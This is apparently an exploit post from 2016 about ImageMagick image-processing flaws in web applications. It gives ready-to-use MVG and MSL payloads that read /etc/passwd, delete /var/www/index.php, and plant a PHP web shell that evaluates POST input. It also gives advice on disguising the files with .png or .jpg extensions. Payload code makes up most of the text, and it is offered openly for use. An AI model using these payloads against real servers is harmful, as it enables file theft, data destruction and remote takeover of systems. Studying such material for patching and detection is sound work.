Credit to @CrazedSec for original paper, ID 4698

ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.

Here are some useful trick to complement the fill 'url()' vulnerability
described by @CrazedSec.

@air


== 1 ==

It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension.  You can change it to .png, .jpg, or anything
else.

If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.


== 2 ==

You can use a similar technique to delete a file, provided ImageMagick is built
with support for it's ephemeral protocol:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context


== 3 ==

You can move files around, provided you're able to determine the location of
uploaded files.  This can be used to upload new files as well as overwrite
existing files.

first_image.png:

<?xml version="1.0" encoding="UTF-8"?>
<image>
    <read filename="/var/www/uploads/second_image.png"/>
    <write filename="/var/www/hi.php"/>
</image>


second_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-context


third_image.png:

push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-context


# siph0n [2016-05-16]